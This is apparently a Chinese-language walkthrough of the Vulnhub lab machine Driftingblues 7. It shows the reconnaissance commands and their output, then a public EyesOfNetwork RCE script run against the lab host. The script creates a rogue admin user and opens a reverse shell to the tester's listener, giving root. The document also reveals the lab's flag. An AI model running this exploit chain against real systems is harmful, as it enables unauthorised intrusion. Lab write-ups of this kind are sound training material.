Vulnhub之Driftingblues 7靶机解题过程
Driftingblues 7
识别目标主机IP地址
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue7]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.66.0/16 | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 3 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:87:54:c9 1 60 PCS Systemtechnik GmbH
192.168.56.196 08:00:27:84:f0:64 2 120 PCS Systemtechnik GmbH
利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.196
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue7]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.196 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-20 06:36 EST
Nmap scan report for localhost (192.168.56.196)
Host is up (0.00013s latency).
Not shown: 65527 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 c4:fa:e5:5f:88:c1:a1:f0:51:8b:ae:e3:fb:c1:27:72 (RSA)
| 256 01:97:8b:bf:ad:ba:5c:78:a7:45:90:a1:0a:63:fc:21 (ECDSA)
|_ 256 45:28:39:e0:1b:a8:85:e0:c0:b0:fa:1f:00:8c:5e:d1 (ED25519)
66/tcp open http SimpleHTTPServer 0.6 (Python 2.7.5)
|_http-server-header: SimpleHTTP/0.6 Python/2.7.5
|_http-title: Scalable Cost Effective Cloud Storage for Developers
80/tcp open http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 mod_perl/2.0.11 Perl/v5.16.3)
|_http-title: Did not follow redirect to https://localhost/
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 mod_perl/2.0.11 Perl/v5.16.3
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
|_ 100000 3,4 111/udp6 rpcbind
443/tcp open ssl/http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 mod_perl/2.0.11 Perl/v5.16.3)
| ssl-cert: Subject: commonName=localhost/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2021-04-03T14:37:22
|_Not valid after: 2022-04-03T14:37:22
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 mod_perl/2.0.11 Perl/v5.16.3
2403/tcp open taskmaster2000?
3306/tcp open mysql MariaDB (unauthorized)
8086/tcp open http InfluxDB http admin 1.7.9
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
MAC Address: 08:00:27:84:F0:64 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 141.21 seconds
Get Access
端口66
先来看66端口,该端口返回的是静态页面
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue7]
└─$ gobuster dir -u http://192.168.56.196:66 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.196:66
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/20 06:43:51 Starting gobuster in directory enumeration mode
===============================================================
/index_files (Status: 301) [Size: 0] [--> /index_files/]
/eon (Status: 200) [Size: 248]
Progress: 220560 / 220561 (100.00%)===============================================================
2022/11/20 06:46:18 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue7]
└─$ curl http://192.168.56.196:66/index_files/
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><html>
<title>Directory listing for /index_files/</title>
<body>
<h2>Directory listing for /index_files/</h2>
<hr>
<ul>
<li><a href="b2-customer-logos.jpg">b2-customer-logos.jpg</a>
<li><a href="b2_nav.css">b2_nav.css</a>
<li><a href="backblaze-logo.webp">backblaze-logo.webp</a>
<li><a href="best-online-backup-service2.css">best-online-backup-service2.css</a>
<li><a href="bootstrap.css">bootstrap.css</a>
<li><a href="bootstrap.js">bootstrap.js</a>
<li><a href="conversion.js">conversion.js</a>
<li><a href="counter.css">counter.css</a>
<li><a href="counter.js">counter.js</a>
<li><a href="css.css">css.css</a>
<li><a href="detectmobiledevice.js">detectmobiledevice.js</a>
<li><a href="dynamic-variables.js">dynamic-variables.js</a>
<li><a href="event-id.js">event-id.js</a>
<li><a href="gtm.js">gtm.js</a>
<li><a href="home-illustration-using-single-cloud.jpg">home-illustration-using-single-cloud.jpg</a>
<li><a href="home-two-cloud-cabinet.webp">home-two-cloud-cabinet.webp</a>
<li><a href="home-two-cloud-copy.webp">home-two-cloud-copy.webp</a>
<li><a href="home-two-mobile.webp">home-two-mobile.webp</a>
<li><a href="home-two-movie.webp">home-two-movie.webp</a>
<li><a href="home.css">home.css</a>
<li><a href="jquery-1.js">jquery-1.js</a>
<li><a href="jquery.js">jquery.js</a>
<li><a href="main.css">main.css</a>
<li><a href="main.js">main.js</a>
<li><a href="nav.js">nav.js</a>
<li><a href="on_download_20181107.js">on_download_20181107.js</a>
<li><a href="page-id.js">page-id.js</a>
<li><a href="plang_english_a.webp">plang_english_a.webp</a>
</ul>
<hr>
</body>
</html>
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue7]
└─$
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue7]
└─$ mv ~/Downloads/eon .
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue7]
└─$ ls
eon nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue7]
└─$ cat eon
UEsDBBQAAQAAAAOfg1LxSVvWHwAAABMAAAAJAAAAY3JlZHMudHh093OsvnCY1d4tLCZqMvRD+ZUU
Rw+5YmOf9bS11scvmFBLAQI/ABQAAQAAAAOfg1LxSVvWHwAAABMAAAAJACQAAAAAAAAAIAAAAAAA
AABjcmVkcy50eHQKACAAAAAAAAEAGABssaU7qijXAYPcazaqKNcBg9xrNqoo1wFQSwUGAAAAAAEA
AQBbAAAARgAAAAAA
eon文件不知道是什么编码格式,暂时先搁置一下。
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue7]
└─$ gobuster dir -u http://192.168.56.196:66 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.196:66
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Extensions: php,txt,html,sh
[+] Timeout: 10s
===============================================================
2022/11/20 06:48:04 Starting gobuster in directory enumeration mode
===============================================================
/flag.txt (Status: 200) [Size: 1823]
/index_files (Status: 301) [Size: 0] [--> /index_files/]
/eon (Status: 200) [Size: 248]
用gobuster工具继续扫描一下66端口下的文件,竟然发现了一个User flag
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue7]
└─$ curl http://192.168.56.196:66/flag.txt
flag 1/1
░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
░░░░█░░░░░░░░░░░░░░░░░░░░░░█
░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
█░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
█░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
░░▐▌░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
░░░█▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
░░█░░▌░█░░█░░█░░░█░░█░░█
░░█░░▀▀░░██░░█░░░█░░█░░█
░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█
congratulations!
端口80
浏览器访问80端口,自动重定向到443,返回一个登录页面。
──(kali㉿kali)-[~/Vulnhub/Driftingblue7]
└─$ nikto -h https://192.168.56.196
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.196
+ Target Hostname: 192.168.56.196
+ Target Port: 443
---------------------------------------------------------------------------
+ SSL Info: Subject: /C=--/ST=SomeState/L=SomeCity/O=SomeOrganization/OU=SomeOrganizationalUnit/CN=localhost/emailAddress=root@localhost
Ciphers: ECDHE-RSA-AES256-GCM-SHA384
Issuer: /C=--/ST=SomeState/L=SomeCity/O=SomeOrganization/OU=SomeOrganizationalUnit/CN=localhost/emailAddress=root@localhost
+ Start Time: 2022-11-20 07:02:34 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 mod_perl/2.0.11 Perl/v5.16.3
+ Retrieved x-powered-by header: PHP/5.4.16
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The site uses SSL and Expect-CT header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: ./module/dashboard_view/index.php
+ Apache/2.4.6 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ PHP/5.4.16 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch.
+ OpenSSL/1.0.2k-fips appears to be outdated (current is at least 1.1.1). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ Perl/v5.16.3 appears to be outdated (current is at least v5.20.0)
+ Hostname '192.168.56.196' does not match certificate's names: localhost
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 8724 requests: 0 error(s) and 18 item(s) reported on remote host
+ End Time: 2022-11-20 07:03:16 (GMT-5) (42 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (mod_perl/2.0.11) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)?
Gobuster工具也没有扫描出有价值的目录或者文件。
但是已经知道CMS是eyesofnetwork,而且确实存在漏洞:
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue7]
└─$ searchsploit eyesofnetwork
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
EyesOfNetwork (EON) 5.0 - Remote Code Execution | php/webapps/41746.md
EyesOfNetwork (EON) 5.0 - SQL Injection | php/webapps/41747.md
EyesOfNetwork (EON) 5.1 - SQL Injection | php/webapps/41774.py
EyesOfNetwork - AutoDiscovery Target Command Execution (Metasploit) | multiple/remote/48169.rb
EyesOfNetwork 5.1 - Authenticated Remote Command Execution | php/webapps/47280.py
EyesOfNetwork 5.3 - File Upload Remote Code Execution | multiple/webapps/49432.sh
EyesOfNetwork 5.3 - LFI | multiple/webapps/49404.txt
EyesOfNetwork 5.3 - RCE & PrivEsc | multiple/webapps/49402.txt
EyesOfNetwork 5.3 - Remote Code Execution | php/webapps/48025.txt
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------
端口2403
不能访问
端口8086
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue7]
└─$ curl http://192.168.56.196:8086/
404 page not found
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue7]
└─$ gobuster dir -u http://192.168.56.196:8086 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.196:8086
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/20 07:13:48 Starting gobuster in directory enumeration mode
===============================================================
/status (Status: 204) [Size: 0]
/query (Status: 400) [Size: 45]
/write (Status: 405) [Size: 19]
/ping (Status: 204) [Size: 0]
/metrics (Status: 200) [Size: 5517]
Progress: 218761 / 220561 (99.18%)===============================================================
2022/11/20 07:14:08 Finished
===============================================================
访问ping目录,返回是空的,是不是有参数,FUZZ一下?
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue7]
└─$ wfuzz -c -u http://192.168.56.196:8086/ping?FUZZ=127.0.0.1 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 0
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.56.196:8086/ping?FUZZ=127.0.0.1
Total requests: 220560
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
Total time: 121.7918
Processed Requests: 220560
Filtered Requests: 220560
Requests/sec.: 1810.958
没有收获!
但是query目录有点意思了
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue7]
└─$ curl http://192.168.56.196:8086/query?q=show%20databases;
{"results":[{"statement_id":0,"series":[{"name":"databases","columns":["name"],"values":[["nagflux"],["_internal"]]}]}]}
不过没啥天大的价格,只有一个用户名。
接下来主要是从80或者443端口入手,扎到CMS的版本,以及相应的漏洞利用脚本:
查询EyesOfNetwork 5.1 to 5.3 exploits:
链接:
https://github.com/h4knet/eonrce
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue7/eonrce]
└─$ python eonrce.py https://192.168.56.196 -ip 192.168.56.137 -port 5555
+-----------------------------------------------------------------------------+
| EyesOfNetwork 5.3 RCE |
| 03/2020 - v1.1 - Clément Billac - Twitter: @h4knet |
+-----------------------------------------------------------------------------+
[*] Reverse shell: 192.168.56.137:5555
[*] User to create: h4ker:net_was_here
[*] EyesOfNetwork login page found
[*] EyesOfNetwork API page found. API version: 2.4.2
[+] Admin user key obtained: b67dfa1ef76596bbe3813e5b209578873f2053bab2df4d98000f595508fbd9ef
[+] New user h4ker successfully created. ID:2
[+] Successfully authenticated
[+] Discovery job successfully created with ID: 1
[*] Spawning netcat listener:
listening on [192.168.56.137] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.196] 54576
sh: no job control in this shell
sh-4.2# id
id
uid=0(root) gid=0(root) groups=0(root)
sh-4.2# cat /root
cat /root
cat: /root: Is a directory
sh-4.2# ls -alh
ls -alh
total 32K
drwxr-xr-x. 3 nagios root 4.0K Apr 3 2021 .
drwxr-xr-x. 14 nagios root 4.0K Apr 3 2021 ..
-rw-r--r--. 1 nagios root 5.6K Dec 18 2019 autodiscover.php
-rw-r--r--. 1 nagios root 8.2K Dec 18 2019 classes.inc.php
drwxr-xr-x. 3 nagios root 4.0K Apr 3 2021 engines
sh-4.2#
直接就拿到了root 权限!
STRIVE FOR PROGRESS,NOT FOR PERFECTION
